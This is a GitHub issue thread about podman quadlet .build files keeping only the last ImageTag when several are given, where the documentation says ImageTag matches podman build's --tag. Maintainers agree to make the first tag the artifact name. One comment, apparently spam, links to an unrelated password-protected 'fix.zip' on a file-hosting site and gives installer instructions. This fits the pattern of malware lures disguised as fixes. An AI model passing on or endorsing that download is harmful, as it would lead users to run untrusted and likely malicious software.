### ISSUE TITLE
podman .build quadlet ImageTag not equivalent to --tag with podman build

### ISSUE THREAD

**Issue by kraftreich** [containers/podman#23781]
### Issue Description

podman build with multiple --tag is supported. eg
podman build -t testimage:0.0.5 -t testimage:latest build/

a quadlet testimage.build with multiple ImageTag does not work, it takes the last ImageTag
```
[Build]
File=%h/build/Containerfile
ImageTag=testimage:0.0.5
ImageTag=testimage:latest
Label = testimage
SetWorkingDirectory=%h/build

[Service]
TimeoutStartSec=900
```
From the docs, --tag should be equivalent to ImageTag
```
ImageTag=
Specifies the name which is assigned to the resulting image if the build process completes successfully.

This is equivalent to the --tag option of podman build.
```

### Steps to reproduce the issue

Steps to reproduce the issue
1.
2.
3.

### Describe the results you received

Describe the results you received

### Describe the results you expected

Describe the results you expected

### podman info output

```yaml
If you are unable to run podman info for any reason, please provide the podman version, operating system and its version and the architecture you are running.
```

### Podman in a container

No

### Privileged Or Rootless

None

### Upstream Latest Release

Yes

### Additional environment details

Additional environment details

### Additional information

Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting

**Comment by kraftreich** [comment]
version fedora 40
```
Client:       Podman Engine
Version:      5.2.1
API Version:  5.2.1
Go Version:   go1.22.5
Built:        Wed Aug 14 02:00:00 2024
OS/Arch:      linux/amd64
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ygalblum** [comment]
Thanks for reporting this. 

You are correct about the multiple tags. But, we need to clear another issue before we can add this support.

One of Quadlet's biggest advantages is the ability to reference one Quadlet unit from a different one. In the case of `.build` files they can be used as the value of the `Image` field for `.container` or `.volume` files. However, this requires Quadlet to know the name of the artifact produced by the `.build` file. Having a single tag allows just that. Multiple tags on the other hand do not.

As I see it, we have three options here:

1. Leave the implementation as is and update the documentation
2. Add a new Key that will be mandatory if multiple `ImageTag` keys are set to provide the name of the artifact
3. Define which one of the instances of `ImageTag` (first or last) should be used as the artifact name.

I don't like option 2 as it will require a duplication and if it is incorrect the dependency breaks. So, the question is whether supporting multiple tags is required. If yes, then we need to define (and implement and document) if it is the first or last occurrence that is the name of the artifact.

**Comment by rhatdan** [comment]
I think I would prefer #3 with ImageTag being first.

**Comment by ygalblum** [comment]
I've opened a PR with the change following @rhatdan's preference.
